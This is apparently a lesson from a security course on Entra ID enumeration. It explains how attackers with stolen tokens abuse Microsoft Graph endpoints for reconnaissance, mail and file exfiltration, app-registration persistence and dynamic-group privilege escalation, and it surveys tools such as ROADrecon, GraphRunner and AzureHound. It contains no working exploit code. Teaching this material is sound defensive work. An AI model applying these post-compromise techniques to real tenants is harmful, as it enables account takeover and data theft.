BAA 06 – Entra ID Enumeration

Microsoft Graph API

Microsoft Graph API is a single REST API endpoint utilized to provide programmatic access to data and services of Microsoft 365, Entra ID, and other Microsoft ecosystems such as users, groups, emails, files, Teams channels, and device configurations. Developers utilize it to automate operations and integrate services, while attackers utilize it to gather reconnaissance, steal sensitive data, or achieve persistence through abusing over-privileged app registrations, stolen tokens, or misconfigured permissions. The appeal of the API is in its extensive reach into M365 assets and Entra ID objects and therefore a high-value target for attacks like data exfiltration, phishing acceleration, or lateral spread into services like OneDrive or Azure. This section expounds on Microsoft Graph exploitation, explaining tools like Microsoft Graph PowerShell SDK, ROADrecon, GraphRunner, and AzureHound, and explains how attackers utilize them in general.

How attackers are Utilizing Stolen Credentials or Tokens

Compromised credentials or tokens with Microsoft Graph scopes enable a range of malicious activities. Attackers perform enumeration by querying users, groups, or devices (GET /v1.0/users), gathering details like User Principal Names (UPNs) or roles for targeted attacks. Data exfiltration targets emails (GET /me/messages), OneDrive files (GET /me/drive/root/children), or Teams messages (GET /teams//channels), extracting sensitive information. Persistence is achieved by registering new applications (POST /applications) with high-privilege scopes or modifying existing ones to backdoor access. Lateral movement uses tokens to pivot across services, such as accessing Azure resources via Graph-integrated roles or exploiting FOCI token-sharing for SSO bypass. Attackers also manipulate service principals to issue new tokens or grant consents, escalating from user-level to admin-level access.

Tools Used by Attackers

Microsoft Graph PowerShell SDK

Scriptable Graph API calls that let an adversary, once they have a valid token, enumerate users, groups, apps and permission scopes at scale.

ROADrecon / ROADtools

Automates collection of Entra tenant metadata (users, service principals, FOCI relationships, devices) into a local database for fast mapping of over-privileged apps and relationships.

GraphRunner

Post-compromise PowerShell toolkit for token handling, Teams/SharePoint enumeration and automated checks against app scopes and service-principal configurations.

AzureHound

Collector that produces BloodHound-compatible datasets from Graph/Azure metadata to visualize user→app→service-principal attack paths and lateral movement opportunities.

ROADtx / PRT techniques

Techniques and tooling that work with Primary Refresh Tokens and other refresh/token workflows to derive session access and enable silent token exchanges across services.

Dynamic Groups

Dynamic groups in Microsoft Entra ID automatically add or remove users and devices based on membership rules written in OData-style expressions that evaluate object attributes (such as department, deviceOSType, or extension attributes). While this simplifies management, it introduces risk if an attacker gains permissions to modify those attributes. Roles such as Global Administrator, User Administrator, and Privileged Role Administrator can edit user properties that dynamic group rules rely on. Additionally, any application or service principal granted Directory.ReadWrite.All or User.ReadWrite.All Graph API permissions can modify user attributes programmatically. By changing these values, an attacker could manipulate dynamic group rules so that their account meets the membership criteria, automatically adding themselves to a privileged group and escalating access.

Additional Reading:

Lesson Content
0% Complete 0/2 Steps
Previous Topic
Back to Course
Next Topic